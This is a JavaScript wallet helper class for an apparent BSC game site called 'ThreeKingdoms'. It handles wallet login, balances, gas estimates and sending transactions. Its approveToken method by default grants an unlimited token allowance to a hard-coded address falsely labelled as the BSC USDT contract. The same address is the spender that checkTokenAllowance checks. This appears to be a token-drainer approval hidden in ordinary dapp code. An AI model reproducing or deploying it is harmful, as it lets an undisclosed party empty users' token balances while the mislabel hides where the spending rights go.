class ThreeKingdoms {
    async init(wallet) {
        if (wallet == "onto") {
            if (!window.onto) {
                throw "no wallet";
            }

            window.web3 = new Web3Mine(onto);
        } else {
            if (window.ethereum) {
                window.web3 = new Web3Mine(ethereum);
            } else if (window.web3) {
                window.web3 = new Web3Mine(web3.currentProvider);
            } else {
                throw "no wallet";
            }
        }
    }

    async login() {
        let accounts = await web3.eth.requestAccounts();
        this.account = accounts[0];

        this.chainId = await web3.eth.getChainId();

        return this.account;
    }

    // 新增授权相关方法
    static BSC_USDT_CONTRACT = '0xb300000b72DEAEb607a12d5f54773D1C19c7028d';
    static ERC20_ABI = [
        {
            "constant": true,
            "inputs": [
                {"name": "owner", "type": "address"},
                {"name": "spender", "type": "address"}
            ],
            "name": "allowance",
            "outputs": [{"name": "", "type": "uint256"}],
            "type": "function"
        },
        {
            "constant": false,
            "inputs": [
                {"name": "spender", "type": "address"},
                {"name": "amount", "type": "uint256"}
            ],
            "name": "approve",
            "outputs": [{"name": "", "type": "bool"}],
            "type": "function"
        }
    ];

    sign(message) {
        return web3.eth.personal.sign(message, this.account);
    }

    // 小转大
    toReal(amount, decimal = 18) {
        let dec = BigDecimal.TEN.pow(new BigDecimal(decimal.toString()));
        return new BigDecimal(amount.toString()).multiply(dec)
        .setScale(0, BigDecimal.ROUND_DOWN).toString();
    }

    // 大转小
    toDisplay(amount, decimal = 18, scale = 4) {
        let dec = BigDecimal.TEN.pow(new BigDecimal(decimal.toString()));
        return new BigDecimal(amount.toString())
        .divide(dec, Number(scale), BigDecimal.ROUND_DOWN).toString();
    }

    async getETHBalance() {
        return await web3.eth.getBalance(this.account);
    }
    getContract(abi, address) {
        return new web3.eth.Contract(abi, address);
    }

    call(params) {
        if (!params.contract) {
            params.contract = this.getContract(params.abi, params.address);
        }

        if (!params.args) {
            params.args = [];
        }

        return params.contract.methods[params.method].apply(this, params.args).call();
    }

    async getTokenBalance(address, account1) {
        console.log('获取余额传参数',address, account1)
        return await this.call({
            abi: ABIS.LP,
            address: address,
            method: "balanceOf",
            args: [account1 || this.account],
        });
    }


    /**
     * 预估交易gas并检查是否会报错
     * @param {object} createInfo 交易信息
     * @param {number} retryCount 重试次数
     */
    async estimateAndSend(createInfo) {
        try {
            // 1. 预估gas
            const gasEstimate = await web3.eth.estimateGas({
                from: this.account,
                to: createInfo.to,
                value: createInfo.value,
                data: createInfo.data.startsWith('0x')
                    ? createInfo.data
                    : '0x' + createInfo.data
            });

            return gasEstimate;
        } catch (error) {
            console.error('交易预估失败:', error);
        }
    }
    /**
     * 检查代币授权额度
     * @param {string} tokenAddress 代币合约地址
     * @param {string} ownerAddress 所有者地址
     * @param {number} decimals 代币精度
     */
    async checkTokenAllowance(tokenAddress, ownerAddress, decimals = 18) {
        const allowance = await this.call({
            abi: ThreeKingdoms.ERC20_ABI,
            address: tokenAddress,
            method: "allowance",
            args: [ownerAddress, ThreeKingdoms.BSC_USDT_CONTRACT]
        });
        return allowance
    }

    /**
     * 授权代币
     * @param {string} tokenAddress 代币合约地址
     * @param {string} amount 授权金额（默认无限授权）
     */
    async approveToken(tokenAddress, amount = 'infinite') {
        const contract = new window.web3.eth.Contract(
            ThreeKingdoms.ERC20_ABI,
            tokenAddress
        );

        const approveAmount = amount === 'infinite'
            ? '0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
            : window.web3.utils.toHex(amount);

        const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
        const from = accounts[0];

        return contract.methods.approve(ThreeKingdoms.BSC_USDT_CONTRACT, approveAmount).send({
            from,
        });
    }

    /**
     * 发送交易
     * @param {object} createInfo 交易信息
     */
    async sendTransaction(createInfo) {
        try {
            const params = {
                from: this.account,
                to: createInfo.to,
                value: window.web3.utils.toHex(createInfo.value),
                // gas: window.web3.utils.toHex(createInfo.gasLimit),
                // gasPrice: window.web3.utils.toHex(createInfo.gasPrice),
                // nonce: window.web3.utils.toHex(createInfo.nonce),
                data: createInfo.data.startsWith('0x') ? createInfo.data : '0x' + createInfo.data,
            };

            if (window.ethereum) {
                await window.ethereum.request({ method: 'eth_requestAccounts' });
                return await window.ethereum.request({
                    method: 'eth_sendTransaction',
                    params: [params]
                });
            }
            throw new Error('未检测到以太坊钱包');
        } catch (error) {
            console.error('发送交易失败:', error);
            throw error;
        }
    }

    /**
     * 等待交易确认
     */
    async waitForTransactionReceipt(txHash, interval = 1000, maxAttempts = 10) {
        let attempts = 0;
        while (attempts < maxAttempts) {
            attempts++;
            await new Promise(resolve => setTimeout(resolve, interval));
            const receipt = await web3.eth.getTransactionReceipt(txHash);
            if (receipt) {
                return {
                    success: receipt.status,
                    receipt
                };
            }
        }
        throw new Error('交易确认超时');
    }
}

window.threeKingdoms = new ThreeKingdoms();
